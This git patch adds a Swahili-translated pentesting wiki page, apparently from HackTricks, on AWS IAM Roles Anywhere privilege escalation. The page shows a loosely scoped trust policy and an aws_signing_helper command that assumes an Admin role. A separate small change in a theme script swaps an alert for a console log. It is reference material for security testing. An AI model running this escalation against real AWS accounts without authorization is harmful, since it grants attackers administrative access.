From 3c5d281ffecb48b0dcdbfa83ccfc120032a231e6 Mon Sep 17 00:00:00 2001
From: Translator <github-actions@github.com>
Date: Tue, 24 Jun 2025 14:00:32 +0000
Subject: [PATCH] Translated
 ['src/pentesting-cloud/aws-security/aws-privilege-escalation/

---
 .../aws-iam-roles-anywhere-privesc.md         | 42 +++++++++++++++++++
 theme/ai.js                                   |  2 +-
 2 files changed, 43 insertions(+), 1 deletion(-)
 create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-roles-anywhere-privesc.md

diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-roles-anywhere-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-roles-anywhere-privesc.md
new file mode 100644
index 000000000..75f2d0a62
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-roles-anywhere-privesc.md
@@ -0,0 +1,42 @@
+# AWS - IAM Roles Anywhere Privesc
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+AWS IAM RolesAnywhere inaruhusu kazi zinazofanyika nje ya AWS kuchukua majukumu ya IAM kwa kutumia vyeti vya X.509. Lakini wakati sera za kuamini hazijapangwa vizuri, zinaweza kutumika vibaya kwa ajili ya kupandisha hadhi.
+
+Sera hii haina vizuizi kuhusu ni vipi kiunganishi cha kuamini au sifa za cheti zinazoruhusiwa. Kama matokeo, cheti chochote kilichounganishwa na kiunganishi chochote cha kuamini katika akaunti kinaweza kutumika kuchukua jukumu hili.
+```json
+{
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"Service": "rolesanywhere.amazonaws.com"
+},
+"Action": [
+"sts:AssumeRole",
+"sts:SetSourceIdentity",
+"sts:TagSession"
+]
+}
+]
+}
+
+```
+Ili kupata privesc, `aws_signing_helper` inahitajika kutoka https://docs.aws.amazon.com/rolesanywhere/latest/userguide/credential-helper.html
+
+Kisha kwa kutumia cheti halali, mshambuliaji anaweza kuhamasisha katika jukumu la juu la mamlaka.
+```bash
+aws_signing_helper credential-process \
+--certificate readonly.pem \
+--private-key readonly.key \
+--trust-anchor-arn arn:aws:rolesanywhere:us-east-1:123456789012:trust-anchor/ta-id \
+--profile-arn arn:aws:rolesanywhere:us-east-1:123456789012:profile/default \
+--role-arn arn:aws:iam::123456789012:role/Admin
+```
+### Marejeleo
+
+- https://www.ruse.tech/blogs/aws-roles-anywhere-privilege-escalation/
+
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/theme/ai.js b/theme/ai.js
index c94992d5f..13337c3f1 100644
--- a/theme/ai.js
+++ b/theme/ai.js
@@ -226,7 +226,7 @@
         `threadId=${threadId}; Path=/; Secure; SameSite=Strict; Max-Age=7200`;
     } catch (e) {
       console.error("Error creating threadId:", e);
-      alert("Failed to initialise the conversation. Please refresh.");
+      console.log("Failed to initialise the conversation. Please refresh.");
       throw e;
     }
   }